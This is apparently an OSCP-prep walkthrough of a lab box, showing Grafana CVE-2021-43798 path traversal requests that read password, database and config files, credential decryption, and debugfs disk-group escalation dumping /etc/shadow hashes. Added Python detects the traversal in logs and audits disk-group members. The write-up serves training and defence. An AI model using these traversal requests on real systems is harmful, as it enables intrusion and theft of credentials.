June 11, 2026
Fantastic | Proving Grounds | OSCP Preparation
Box: Fantastic Community Rating: Hard
SilentExploit
We can start off with an nmap scan of the target:
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-11 23:34 BST
Initiating Parallel DNS resolution of 1 host. at 23:34
Completed Parallel DNS resolution of 1 host. at 23:34, 0.02s elapsed
Initiating SYN Stealth Scan at 23:34
Scanning 192.168.181.181 [65535 ports]
Discovered open port 22/tcp on 192.168.181.181
Discovered open port 3000/tcp on 192.168.181.181
Discovered open port 9090/tcp on 192.168.181.181
Completed SYN Stealth Scan at 23:35, 9.78s elapsed (65535 total ports)
Nmap scan report for 192.168.181.181
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
9090/tcp open zeus-admin
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 9.92 seconds
Raw packets sent: 65538 (2.884MB) | Rcvd: 65538 (2.622MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-11 23:35 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:35
Completed Parallel DNS resolution of 1 host. at 23:35, 0.02s elapsed
Initiating SYN Stealth Scan at 23:35
Scanning 192.168.181.181 [1000 ports]
Discovered open port 22/tcp on 192.168.181.181
Discovered open port 3000/tcp on 192.168.181.181
Discovered open port 9090/tcp on 192.168.181.181
Completed SYN Stealth Scan at 23:35, 0.41s elapsed (1000 total ports)
Initiating Service scan at 23:35
Scanning 3 services on 192.168.181.181
Completed Service scan at 23:35, 36.64s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.181.181.
Initiating NSE at 23:35
Completed NSE at 23:36, 30.07s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.12s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Nmap scan report for 192.168.181.181
Host is up (0.022s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
3000/tcp open http Grafana http
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Grafana
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: 9FB2EC595C187307F390043A5AA66F8B
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 1 disallowed entry
|_/
9090/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_ Supported Methods: GET OPTIONS
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph
|_http-favicon: Unknown favicon MD5: 5EE43B38986A144D6B5022EA8C8F748F
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.01s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.81 seconds
Raw packets sent: 1000 (44.000KB) | Rcvd: 1000 (40.012KB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-11 23:36 BST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:36
Completed NSE at 23:36, 10.01s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating Ping Scan at 23:36
Scanning 192.168.181.181 [4 ports]
Completed Ping Scan at 23:36, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:36
Completed Parallel DNS resolution of 1 host. at 23:36, 0.02s elapsed
Initiating SYN Stealth Scan at 23:36
Scanning 192.168.181.181 [1000 ports]
Discovered open port 22/tcp on 192.168.181.181
Discovered open port 9090/tcp on 192.168.181.181
Discovered open port 3000/tcp on 192.168.181.181
Completed SYN Stealth Scan at 23:36, 0.41s elapsed (1000 total ports)
NSE: Script scanning 192.168.181.181.
Initiating NSE at 23:36
Completed NSE at 23:36, 0.34s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Nmap scan report for 192.168.181.181
Host is up (0.023s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
9090/tcp open zeus-admin
NSE: Script Post-scanning.
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Initiating NSE at 23:36
Completed NSE at 23:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.052KB)
Port 3000
This was our most obvious point of entry; a Grafana instance.
Fingerprinting the service as v8.3.0 was fairly straightforward, as per the above screenshot. How do we get access to the login panel though?
A quick search reveals the classic pair admin:admin.
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# creds search "grafana"
+-------------------+----------+----------+
| Product | username | password |
+-------------------+----------+----------+
| grafana (general) | admin | admin |
+-------------------+----------+----------+
Unfortunately, these credentials don't work. I did spend lots of time going down a rabbit hole trying to brute force / guess less common 'default' credentials.
I then came across a directory traversal exploit: CVE-2021-43798.
It affects Grafana v8.0.0-beta1 through v8.3.0, so our v8.3.0 instance is in range and we are in luck!
There is a clear PoC here that I used as the basis of my testing.
Firstly, I targeted /etc/passwd
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# curl "http://192.168.181.181:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" --path-as-is
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
grafana:x:113:117::/usr/share/grafana:/bin/false
prometheus:x:1000:1000::/home/prometheus:/bin/false
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
This gives us valuable insight that we have two users with shell access: root and sysadmin.
I will always try username as password combos and run a brute force attack in the background as you can sometimes get lucky.
I am learning from doing these OffSec boxes that whenever you have Local File Inclusion you need to think: what configuration files or databases specific to the services running on the target could I pillage information from? For example, if a WordPress site had been discovered in our enumeration phase, we would target /wp-config.php.
Some googling helped uncover that the default location for the Grafana database is /var/lib/grafana/grafana.db
We can grab this via LFI — I simply put the following into my browser and we instantly downloaded it.
http://192.168.181.181:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2fgrafana%2fgrafana.db
If I had researched the attack chain for this exploit I would have saved myself lots of time, but I manually went through every table in the database until I got to the table data_source.
Here I found that we had this 'basicAuthPassword' string that is obviously encoded. We can see that it is also linked to the user sysadmin so this was the green flag we needed to spot that it needs to be decrypted.
Some researching led me to Grafana-Decryptor-for-CVE-2021-43798
Looking at the syntax, it is capable of decrypting my password so long as I provide it with the secret_key from the Grafana instance. The default key is SW2YcwTIb9zpOOhoPsMm, but since I had rushed into the exploitation, I went back to our LFI exploit and grabbed a copy of grafana.ini to make sure.
http://192.168.181.181:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgrafana%2Fgrafana.ini
I then ran the script:
┌──(venv)─(root㉿user)-[/run/…/2024/HTBox/fantastic/Grafana-Decryptor-for-CVE-2021-43798]
└─# python3 decrypt.py
######################################
GRAFANA DECRYPTOR
CVE-2021-43798 Grafana Unauthorized
arbitrary file reading vulnerability
SICARI0
######################################
? Enter the datasource password: anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
/run/media/user/2024/HTBox/fantastic/Grafana-Decryptor-for-CVE-2021-43798/decrypt.py:55: CryptographyDeprecationWarning: CFB has been moved to cryptography.hazmat.decrepit.ciphers.modes.CFB and will be removed from cryptography.hazmat.primitives.ciphers.modes in 49.0.0.
decryptor = Cipher(algorithms.AES(block), modes.CFB(iv), backend=default_backend()).decryptor()
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
[*] plainText= SuperSecureP@ssw0rd
We have our username:password for SSH access: sysadmin:SuperSecureP@ssw0rd
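Seen from the defender's side, every file read in this stage is a GET under /public/plugins/<plugin>/ whose path climbs out of the plugin directory. The following is an added example, not part of the original write-up: a log scanner for that pattern, assuming a reverse proxy in front of Grafana that writes Combined Log Format; the log lines, IP addresses and function names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Assumption: a reverse proxy in front of Grafana writes Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
PLUGIN_PREFIX = "/public/plugins/"
TRAV = "..%2F" * 11  # same encoded prefix as the requests shown in the write-up

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jun/2026:22:40:01 +0000] "GET /login HTTP/1.1" 200 27316 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Jun/2026:22:40:03 +0000] "GET /public/plugins/mysql/img/../img/mysql_logo.svg HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [11/Jun/2026:22:41:07 +0000] "GET /public/plugins/mysql/{TRAV}etc%2Fpasswd HTTP/1.1" 200 1926 "-" "curl/8.5.0"',
    f'203.0.113.7 - - [11/Jun/2026:22:52:30 +0000] "GET /public/plugins/mysql/{TRAV}var%2Flib%2fgrafana%2fgrafana.db HTTP/1.1" 200 593920 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [11/Jun/2026:23:05:12 +0000] "GET /public/plugins/mysql/{TRAV}etc%2Fgrafana%2Fgrafana.ini HTTP/1.1" 200 30112 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [11/Jun/2026:23:09:44 +0000] "GET /public/plugins/mysql/..%2f..%2f..%2fetc%2fhostname HTTP/1.1" 400 0 "-" "-"',
]


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encodings cannot hide a '..' segment."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_target(target):
    """Return (plugin_id, apparent_file) if the request leaves the plugin directory."""
    path = fully_decode(urlsplit(target).path).replace("\\", "/")
    if not path.startswith(PLUGIN_PREFIX):
        return None
    plugin_id, _, rest = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id or ".." not in rest.split("/"):
        return None
    # Resolve against a stand-in directory. A path that stays inside it is a
    # harmless "img/../img/x.svg"; one that leaves it is a traversal. The
    # reported file is where the path lands if the climb reaches the root.
    base = "/plugin-root"
    resolved = posixpath.normpath(posixpath.join(base, rest))
    if resolved == base or resolved.startswith(base + "/"):
        return None
    return plugin_id, resolved


def scan(lines):
    """Return one finding per log line that requests a file outside a plugin directory."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        hit = analyse_target(match["target"])
        if hit:
            status = int(match["status"])
            findings.append({
                "ip": match["ip"],
                "plugin": hit[0],
                "file": hit[1],
                "status": status,
                "served": status == 200,  # 200 means the file content left the host
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["ip"]} plugin={f["plugin"]} file={f["file"]} status={f["status"]}')
```

A finding with `served` set for grafana.db or grafana.ini means the data source credentials and secret_key should be treated as exposed and rotated. Upgrading to a fixed release (8.3.1, or the 8.0.7, 8.1.8 and 8.2.7 backports) closes the traversal itself.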
Privilege Escalation
The privilege escalation on the machine was incredibly quick. If you check the group memberships for sysadmin you'll see the account is a member of the disk group.
$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin),6(disk)
Raj has a great article on how to exploit this.
Essentially, we are using the debugfs tool to interact directly with the system's storage blocks. This bypasses standard operating system file permissions allowing us access to any file on the system.
My command log for reading /etc/shadow and /root/.ssh/id_rsa is below:
sysadmin@fanatastic:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 445M 0 445M 0% /dev
tmpfs 98M 1.2M 97M 2% /run
/dev/sda2 9.8G 5.6G 3.7G 61% /
tmpfs 489M 0 489M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 489M 0 489M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1328
/dev/loop1 33M 33M 0 100% /snap/snapd/12883
/dev/loop3 56M 56M 0 100% /snap/core18/2128
/dev/loop6 71M 71M 0 100% /snap/lxd/21029
/dev/loop4 68M 68M 0 100% /snap/lxd/21835
/dev/loop2 44M 44M 0 100% /snap/snapd/14549
/dev/loop5 56M 56M 0 100% /snap/core18/2284
tmpfs 98M 0 98M 0% /run/user/1001
sysadmin@fanatastic:~$ debugfs /dev/sda2
debugfs 1.45.5 (07-Jan-2020)
debugfs: mkdir test
mkdir: Filesystem opened read/only
debugfs: cat /etc/shadow
root:$6$mAe2JsSJSmg1n45O$78rgk3B6HaklRIPcLOtwP9aX5i.0aPF16NVm39i1cz3K7StTajlI2LFBp.WSxiAAyoB4SQd5qc123HVmH0HXJ/:19052:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
sys:*:18474:0:99999:7:::
sync:*:18474:0:99999:7:::
games:*:18474:0:99999:7:::
man:*:18474:0:99999:7:::
lp:*:18474:0:99999:7:::
mail:*:18474:0:99999:7:::
news:*:18474:0:99999:7:::
uucp:*:18474:0:99999:7:::
proxy:*:18474:0:99999:7:::
www-data:*:18474:0:99999:7:::
backup:*:18474:0:99999:7:::
list:*:18474:0:99999:7:::
irc:*:18474:0:99999:7:::
gnats:*:18474:0:99999:7:::
nobody:*:18474:0:99999:7:::
systemd-network:*:18474:0:99999:7:::
systemd-resolve:*:18474:0:99999:7:::
systemd-timesync:*:18474:0:99999:7:::
messagebus:*:18474:0:99999:7:::
syslog:*:18474:0:99999:7:::
_apt:*:18474:0:99999:7:::
tss:*:18474:0:99999:7:::
uuidd:*:18474:0:99999:7:::
tcpdump:*:18474:0:99999:7:::
landscape:*:18474:0:99999:7:::
pollinate:*:18474:0:99999:7:::
sshd:*:18634:0:99999:7:::
systemd-coredump:!!:18634::::::
lxd:!:18634::::::
usbmux:*:18864:0:99999:7:::
grafana:*:19027:0:99999:7:::
prometheus:!:19027:0:99999:7:::
sysadmin:$6$dpIlzNJI20lx.1rY$42EDl48wSZPsE0rcdqwraFS9ZXCPPLzS4wW4CbJqV4hBuuDWya39YSK0CGIYzaJIWg.vtEQn7615Dqs30eb4/0:19027:0:99999:7:::
debugfs: cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key material removed]
-----END OPENSSH PRIVATE KEY-----
You could either crack the root password or log in via SSH; obviously the latter is easiest, so I saved a copy of the SSH key and authenticated to the target directly as root.
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# chmod 777 id_rsa
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/fantastic]
└─# ssh -i id_rsa root@192.168.181.181
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-97-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 11 Jun 2026 10:30:53 PM UTC
System load: 0.0 Processes: 216
Usage of /: 57.0% of 9.78GB Users logged in: 1
Memory usage: 32% IPv4 address for ens160: 192.168.181.181
Swap usage: 0%
0 updates can be applied immediately.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Mar 1 18:46:45 2022
root@fanatastic:~# id
uid=0(root) gid=0(root) groups=0(root)
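The escalation worked because membership of the disk group is effectively root-equivalent read access to the filesystem. The following is an added example, not part of the original write-up: an audit that lists non-root accounts holding that membership, either as primary or supplementary group. The passwd lines come from the output above, the group lines are reconstructed from the `id` output, and the `imaging` account is hypothetical.

```python
"""Audit which non-root accounts can read raw block devices via group membership."""

RAW_DISK_GROUPS = {"disk"}  # group owning the block device nodes on Debian/Ubuntu
NO_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", ""}

# Constructed sample input. "imaging" is a hypothetical service account added
# to show the primary-group case; gid 6 = disk as in the `id` output above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
grafana:x:113:117::/usr/share/grafana:/bin/false
prometheus:x:1000:1000::/home/prometheus:/bin/false
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
imaging:x:1002:6::/home/imaging:/usr/sbin/nologin
"""
SAMPLE_GROUP = """\
root:x:0:
disk:x:6:sysadmin
grafana:x:117:
prometheus:x:1000:
sysadmin:x:1001:
"""


def parse_colon_file(text, nfields):
    """Split passwd/group style text into field lists, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= nfields:
            rows.append(fields)
    return rows


def raw_disk_accounts(passwd_text, group_text, groups=RAW_DISK_GROUPS):
    """Return findings for non-root accounts that belong to a raw-disk group."""
    gids, members = {}, {}
    for fields in parse_colon_file(group_text, 4):
        name, gid, users = fields[0], fields[2], fields[3]
        if name in groups:
            gids[int(gid)] = name
            members[name] = {u for u in users.split(",") if u}

    findings = []
    for fields in parse_colon_file(passwd_text, 7):
        user, uid, gid, shell = fields[0], int(fields[2]), int(fields[3]), fields[6]
        if uid == 0:
            continue  # root needs no group to read the disk
        via = []
        if gid in gids:
            via.append((gids[gid], "primary"))
        via += [(g, "supplementary") for g, m in members.items() if user in m]
        for group, kind in via:
            findings.append({
                "user": user,
                "group": group,
                "membership": kind,
                "interactive": shell not in NO_LOGIN_SHELLS,
            })
    # Interactive accounts first: one leaked password for them exposes every file.
    return sorted(findings, key=lambda f: (not f["interactive"], f["user"]))


if __name__ == "__main__":
    with open("/etc/passwd") as p, open("/etc/group") as g:
        for f in raw_disk_accounts(p.read(), g.read()):
            print(f'{f["user"]}: {f["membership"]} member of {f["group"]}, '
                  f'interactive={f["interactive"]}')
```

On this box the audit would flag sysadmin; `gpasswd -d sysadmin disk` removes the membership, which takes effect at the account's next login.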